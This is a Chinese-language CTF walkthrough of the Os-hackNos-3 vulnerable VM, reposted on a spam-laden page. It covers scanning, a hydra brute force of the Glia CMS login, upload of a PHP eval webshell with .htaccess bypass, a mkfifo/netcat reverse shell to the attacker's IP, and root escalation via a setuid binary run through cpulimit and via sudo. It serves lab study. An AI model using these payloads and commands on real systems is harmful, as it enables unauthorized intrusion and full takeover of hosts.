当前位置: 首页 > news >正文

民宿设计网站大全网络营销的策略包括

民宿设计网站大全,网络营销的策略包括,网址升级中 请稍后访问,中国甘肃网Os-hackNos-3 一、主机发现和端口扫描 主机发现,靶机地址192.168.80.145 arp-scan -l端口扫描,开放了22和80端口 nmap -P -sV 192.168.80.145二、信息收集 访问80端口 find the Bug You need extra WebSec翻译 找到Bug 你需要额外的网络安全路径扫描 d…

Os-hackNos-3

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.145

     arp-scan -l
    

    在这里插入图片描述

  • 端口扫描,开放了22和80端口

    nmap -P -sV 192.168.80.145
    

    在这里插入图片描述

二、信息收集

  • 访问80端口

    find the Bug
    You need extra WebSec翻译
    找到Bug
    你需要额外的网络安全
    

    在这里插入图片描述

  • 路径扫描

    dirsearch -u "http://192.168.80.145/" -e *
    

    在这里插入图片描述

  • 访问/scripts

    在这里插入图片描述

  • 查看automail.pl文件

    #!/usr/bin/perl
    #######################################################################
    #    automail.pl
    #
    #    Perl script used for remote email piping...same as as the PHP version.
    #
    #    Peter Rotich <peter@osticket.com>
    #    Copyright (c) 2006-2013 osTicket
    #    http://www.osticket.com
    #
    #    Released under the GNU General Public License WITHOUT ANY WARRANTY.
    #    See LICENSE.TXT for details.
    #
    #    vim: expandtab sw=4 ts=4 sts=4:
    ########################################################################Configuration: Enter the url and key. That is it.
    #  url=> URL to pipe.php e.g http://yourdomain.com/support/api/tickets.email
    #  key=> API Key (see admin panel on how to generate a key)%config = (url => 'http://yourdomain.com/support/api/tickets.email',key => 'API KEY HERE');#Get piped message from stdin
    while (<STDIN>) {$rawemail .= $_;
    }use LWP::UserAgent;
    $ua = LWP::UserAgent->new;$ua->agent('osTicket API Client v1.7');
    $ua->default_header('X-API-Key' => $config{'key'});
    $ua->timeout(10);use HTTP::Request::Common qw(POST);my $enc ='text/plain';
    my $req = (POST $config{'url'}, Content_Type => $enc, Content => $rawemail);
    $response = $ua->request($req);#
    # Process response
    # Add exit codes - depending on what your  MTA expects.
    # By default postfix exit codes are used - which are standard for MTAs.
    #use Switch;$code = 75;    
    switch($response->code) {case 201 { $code = 0; }case 400 { $code = 66; }case [401,403] { $code = 77; }case [415,416,417,501] { $code = 65; }case 503 { $code = 69 }case 500 { $code = 75 }
    }
    #print "RESPONSE: ". $response->code. ">>>".$code;
    exit $code;
    
    这段Perl脚本的功能是通过osTicket API将电子邮件消息发送到指定的URL,并根据响应的状态码确定退出码。1. `%config = (url => 'http://yourdomain.com/support/api/tickets.email', key => 'API KEY HERE');` - 定义了存储URL和API密钥的哈希表。
    2. `while (<STDIN>) { $rawemail .= $_; }` - 从标准输入读取管道传输的电子邮件消息并存储在变量 `$rawemail` 中。
    3. `use LWP::UserAgent; $ua = LWP::UserAgent->new; $ua->agent('osTicket API Client v1.7'); $ua->default_header('X-API-Key' => $config{'key'}); $ua->timeout(10);` - 导入LWP::UserAgent模块,创建UserAgent对象,并设置默认的用户代理和超时。
    4. `use HTTP::Request::Common qw(POST);` - 导入HTTP::Request::Common模块,并引入POST请求类型。
    5. `my $req = (POST $config{'url'}, Content_Type => $enc, Content => $rawemail); $response = $ua->request($req);` - 创建一个POST请求,将原始电子邮件消息作为内容发送到指定的URL,并获取响应。
    6. `use Switch;` - 导入Switch模块,用于实现switch语句。
    7. `switch($response->code) { case 201 {...} case 400 {...} ... }` - 用switch语句根据响应状态码选择不同的退出码(根据邮件传输代理的标准)。
    8. `exit $code;` - 根据计算得到的退出码退出脚本
    
  • 没啥价值,根据上面的提示访问/websec路径,发现一个博客和一个邮箱

    contact@hacknos.com
    

    在这里插入图片描述

  • 博客使用Glia CMS搭建的

    在这里插入图片描述

    在这里插入图片描述

三、密码爆破

  • 猜测刚才发现的邮箱就是用户名,再爬取网站信息生成密码本

    cewl http://192.168.80.145/websec/ >/tmp/passwd
    

    在这里插入图片描述

  • 密码爆破

    hydra -l contact@hacknos.com -P /tmp/passwd 192.168.80.145 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V
    

    在这里插入图片描述

  • 登录系统,发现是管理员权限,版本是1.10.9

    用户名:contact@hacknos.com
    密码:Securityx
    

    在这里插入图片描述

四、漏洞利用

  • 在后台发现文件上传功能(content->file managee),上传一句话mua

    <?php @eval($_POST['glc']);?>
    

    在这里插入图片描述

  • 发现文件被上传到了assets目录,在该目录中发现了.htaccess文件禁止访问php文件,那么将deny from all删除后保存

    在这里插入图片描述

  • 使用蚁剑连接,拿到shell

    在这里插入图片描述

五、权限提升

  • nc建立连接

    kali:nc -lvnp 8848
    靶机:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 2>&1|nc 192.168.80.139 8848 >/tmp/f然后执行python -c 'import pty; pty.spawn("/bin/bash")'
    

    在这里插入图片描述

  • 查看是否存在可以提权的命令

    find /usr/bin -type f -perm -u=s 2>/dev/null
    

    在这里插入图片描述

1.第一种方法
  • 发现cpulimit 命令,尝试用cpulimit提权

    一个用户调整CPU使用的命令,cpulimit`命令主要对长期运行的和 CPU 密集型的进程有用
    
    #include<stdio.h>
    #include<unistd.h>
    #include<stdlib.h>int main()
    {setuid(0);setgid(0);system("/bin/bash");return 0;
    }
    
  • 将上面的代码编译为exp,上传之后使用添加运行权限

    gcc cpu.c -o exp
    chmod 777 exp
    

    在这里插入图片描述

  • 使用cpulimit -l 100 -f ./exp进行提权

2.第二种方法
  • /var/local/database中发现了经过加密的内容

    Expenses
    Software Licenses,$2.78
    Maintenance,$68.87
    Mortgage Interest,$70.35
    Advertising,$9.78
    Phone,$406.80
    Insurance,$9.04
    Opss;fackespreadsheet
    

    在这里插入图片描述

  • 对密文进行解密,得到密码明文Security@x@

    https://link.csdn.net/?target=https%3A%2F%2Fwww.spammimic.com%2Fspreadsheet.php
    
  • 登录用户blackdevil,该用户是在/home目录下发现的,然后用sudo提权

    在这里插入图片描述

http://www.ritt.cn/news/14005.html

相关文章:

  • 做网站为什么不要源代码品牌策划包括哪几个方面
  • 网站建设项目国内外分析报告口碑seo推广公司
  • 寺庙网站建设外包公司被辞退有补偿吗
  • 网站是怎么优化的合肥seo推广外包
  • 网站建设时时彩今日头条网站推广
  • 建设工程合同范本 政府网站龙岗网站制作
  • 汽车精品网站建设ciliba磁力猫
  • 拖拽做网站石家庄seo排名公司
  • 南通 网站建设北京seo公司
  • 瓜果蔬菜做的好的电商网站网销怎么做
  • 网页制作与网站建设江西宁波seo外包推广
  • 简历制作免费模板网站成都网络推广哪家好
  • 道滘东莞微信网站建设代写文章多少钱
  • ui设计师岗位介绍东莞网站推广优化公司
  • 做网站要什么资质津seo快速排名
  • 中英双语网站模板网络营销的概念及特点
  • 互动性的网站seo岗位职责
  • 南开网站建设公司nba最新排行榜
  • 城乡建设部统计信息网站百度关键词竞价排名
  • 贵阳建站公司怎么免费创建网站
  • 做360手机网站优化排整合营销方案案例
  • 企业网站开发费用包括哪些合肥seo网站建设
  • 公司的网站推广网络安全有名的培训学校
  • 网站可以做话筒台标吗百度官方网页版
  • 程序员做彩票网站违法吗专门做网站的公司
  • 微信 公司网站 怎么做今日重大财经新闻
  • pageadmin怎么样seo关键词查询工具
  • wordpress图片推荐插件seo新人怎么发外链
  • 河南制作网站网页搜索
  • 啊里网站制作网络培训机构排名前十